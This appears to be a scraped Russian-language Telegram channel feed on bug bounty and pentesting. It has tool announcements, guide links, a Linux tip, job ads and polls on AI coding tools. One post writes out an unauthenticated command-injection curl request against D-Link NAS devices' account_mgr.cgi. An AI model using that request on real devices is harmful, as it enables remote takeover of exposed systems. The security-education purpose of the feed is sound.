Кстати, на Standoff появилась возможность раскрывать отчеты багхантеров. Залетайте👇
🥷 Изучить раскрытые отчеты
#bugbounty
🥷 Изучить раскрытые отчеты
#bugbounty
👍6😁6
🥷 Command injection в параметре
Неаутентифицированное удаленное выполнение кода в четырех различных сетевых устройствах хранения данных, более 60 000 из которых доступны из Интернета.
Настолько простой баг, который можно найти простым фаззингом:
#pentest #bugbounty
name
для D-Link NAS Неаутентифицированное удаленное выполнение кода в четырех различных сетевых устройствах хранения данных, более 60 000 из которых доступны из Интернета.
Настолько простой баг, который можно найти простым фаззингом:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
#pentest #bugbounty
🌚4❤3🥱1
🛠️ 4 новых вектора атак на веб-приложения: за заметку этичному хакеру
Один из способов увеличения шансов на успешное обнаружение багов — поиск новых векторов атак, которые могут пропускаться другими багхантерами. Из очередного гайда от Intigriti вы узнаете про:
☑️ LLM prompt injection
☑️ Prototype pollution
☑️ Client-side path traversals
☑️ Dependency confusion
👉 Читать
#bugbounty #recon
Один из способов увеличения шансов на успешное обнаружение багов — поиск новых векторов атак, которые могут пропускаться другими багхантерами. Из очередного гайда от Intigriti вы узнаете про:
☑️ LLM prompt injection
☑️ Prototype pollution
☑️ Client-side path traversals
☑️ Dependency confusion
👉 Читать
#bugbounty #recon
🚀 Linux Redirection Cheat Sheet: ускоряемся в работе с потоками
Используя STDIN, STDOUT и STDERR, мы можем контролировать, как перенаправлять данные, будь то в файл или null, или объединять ошибки с выводом. Например, чтобы поймать все ошибки скрипта в отдельный лог-файл, легко использовать
💡 Знаете ли вы, что порядок перенаправлений имеет значение? Команды
#linux #tips by sysxplore
Используя STDIN, STDOUT и STDERR, мы можем контролировать, как перенаправлять данные, будь то в файл или null, или объединять ошибки с выводом. Например, чтобы поймать все ошибки скрипта в отдельный лог-файл, легко использовать
2> error.log
, а если хотите собрать всё вместе, можно воспользоваться 2>&1
.💡 Знаете ли вы, что порядок перенаправлений имеет значение? Команды
command > /dev/null 2>&1
и command 2>&1 > /dev/null
делают совершенно разные вещи! Так что будьте внимательны. 😉#linux #tips by sysxplore
👍4
⚒️🔥 BlindBrute — настраиваемый Python-инструмент для обнаружения слепых атак с использованием SQL-инъекций
Он поддерживает несколько методов обнаружения, включая проверку кода состояния, длины содержимого, сравнение ключевых слов и проверку по времени.
Инструмент также позволяет гибко внедрять пэйлоад с помощью заголовков, строк запроса, данных запроса и сырых шаблонов HTTP-запросов, что делает его пригодным для широкого спектра кейсов.
👉 GitHub
#tools #pentest #recon
Он поддерживает несколько методов обнаружения, включая проверку кода состояния, длины содержимого, сравнение ключевых слов и проверку по времени.
Инструмент также позволяет гибко внедрять пэйлоад с помощью заголовков, строк запроса, данных запроса и сырых шаблонов HTTP-запросов, что делает его пригодным для широкого спектра кейсов.
👉 GitHub
#tools #pentest #recon
👍5
📦 Тестирование на проникновение методом белого ящика: как отлаживать JavaScript-уязвимости
На примере уязвимого для prototype pollution веб-приложения вы узнаете все необходимое про отладку JavaScript в VS Code + научитесь отслеживать пэйлоад на протяжении всего процесса разработки кода и разберетесь, как фильтры безопасности могут скрывать уязвимости.
👉 Читать гайд
#tools #bugbounty
На примере уязвимого для prototype pollution веб-приложения вы узнаете все необходимое про отладку JavaScript в VS Code + научитесь отслеживать пэйлоад на протяжении всего процесса разработки кода и разберетесь, как фильтры безопасности могут скрывать уязвимости.
👉 Читать гайд
#tools #bugbounty
👍3
👂 Listen to the Whispers: Web Timing Attacks that Actually Work
James Kettle наконец-то выступил с докладом по теме своего исследования, связанного с новыми концепциями атак. Они позволяют узнать секреты сервера, включая скрытые неверные конфигурации, слепое внедрение структур данных, скрытые роуты к запрещенным зонам и обширную область невидимых поверхностей атак.
👉 Смотреть
#bugbounty #research
James Kettle наконец-то выступил с докладом по теме своего исследования, связанного с новыми концепциями атак. Они позволяют узнать секреты сервера, включая скрытые неверные конфигурации, слепое внедрение структур данных, скрытые роуты к запрещенным зонам и обширную область невидимых поверхностей атак.
👉 Смотреть
#bugbounty #research
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
💡🔍 Отфильтруйте активные имена хостов из списка пассивных поддоменов, а затем проверьте наличие активных HTTP-сервисов и определите используемые технологии с помощью опции
Все это можно получить с помощью простого однострочника👆
#bugbounty #recon #tips by bugcrowd
httpx
-td
! Все это можно получить с помощью простого однострочника👆
#bugbounty #recon #tips by bugcrowd
❗Вакансии «Библиотеки программиста» — ждем вас в команде!
Мы постоянно растем и развиваемся, поэтому создали отдельную страницу, на которой будут размещены наши актуальные вакансии. Сейчас мы ищем:
👉контент-менеджеров для ведения телеграм-каналов
Подробности тут
Мы предлагаем частичную занятость и полностью удаленный формат работы — можно совмещать с основной и находиться в любом месте🌴
Ждем ваших откликов 👾
Мы постоянно растем и развиваемся, поэтому создали отдельную страницу, на которой будут размещены наши актуальные вакансии. Сейчас мы ищем:
👉контент-менеджеров для ведения телеграм-каналов
Подробности тут
Мы предлагаем частичную занятость и полностью удаленный формат работы — можно совмещать с основной и находиться в любом месте🌴
Ждем ваших откликов 👾
job.proglib.io
Вакансии в медиа «Библиотека программиста»
Количество проектов в редакции постоянно растет, так что нам всегда нужны специалисты
⚡1
🔎🕵️♂️ Shazzer — онлайн-фаззер, позволяющий проводить фаззинг всех видов поведения браузера. Поделитесь результатами фаззинга со всем миром и найдите новые баги!
Шпаргалки, представленные на сайте, созданы из всех соответствующих векторов атаки.
🐛 Искать баги
#tools #bugbounty
Шпаргалки, представленные на сайте, созданы из всех соответствующих векторов атаки.
🐛 Искать баги
#tools #bugbounty
🔥2
🤔🎄🎁 Какой подарок вы бы хотели на Новый год?
Да, начинать готовиться к Новому году никогда не рано 😉
#интерактив
#интерактив
🥱1
🧑💻 Статьи для IT: как объяснять и распространять значимые идеи
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
🌐 Браузеры — отличное место для поиска багов, особенно когда ты в числе первых врываешься в новую багбаунти-программу. Именно так и было у автора статьи. В браузере Arc ему удалось найти UXSS, Local File Read, Arbitrary File Creation и Path Traversal для RCE.
👉 Читайте о каждой уязвимости на Medium или в PDF (файл в комментариях)
#bugbounty #writeup
👉 Читайте о каждой уязвимости на Medium или в PDF (файл в комментариях)
#bugbounty #writeup
🔥5❤🔥1
Forwarded from Библиотека Go-разработчика | Golang
🔐 Понимание уязвимостей, связанных с внедрением команд в Go
Если вы вызываете системные утилиты из кода, вы можете предпринять некоторые базовые, но важные меры предосторожности, чтобы избежать проблем с безопасностью(вы ведь не хотите, чтобы кто-то мог убедить ваш сервер запустить rm или что-то похуже) .
👉 Читать гайд
Если вы вызываете системные утилиты из кода, вы можете предпринять некоторые базовые, но важные меры предосторожности, чтобы избежать проблем с безопасностью
👉 Читать гайд
😁2👍1
Привет, друзья! 👋
Мы готовим статью об ИИ-инструментах для программирования в 2024 году и хотим услышать ваше мнение! 🤖💻 Поделитесь своим опытом и помогите нам сделать материал ещё полезнее. Самые интересные ответы войдут в статью! 🏆
Мы готовим статью об ИИ-инструментах для программирования в 2024 году и хотим услышать ваше мнение! 🤖💻 Поделитесь своим опытом и помогите нам сделать материал ещё полезнее. Самые интересные ответы войдут в статью! 🏆
Какой ИИ-инструмент для программирования вы считаете самым полезным и почему? 🛠
Anonymous Poll
13%
GitHub Copilot
49%
ChatGPT
5%
Claude
3%
Codeium
5%
Локальные LLM
21%
Не пользуюсь ИИ
5%
Другой (укажу в комментариях)
Какой аспект разработки, по вашему мнению, больше всего выигрывает от использования ИИ? 🚀
Anonymous Poll
31%
Автодополнение кода
32%
Генерация кода с нуля
24%
Отладка и поиск ошибок
9%
Оптимизация существующего кода
4%
Другое (поделитесь в комментариях)
👍1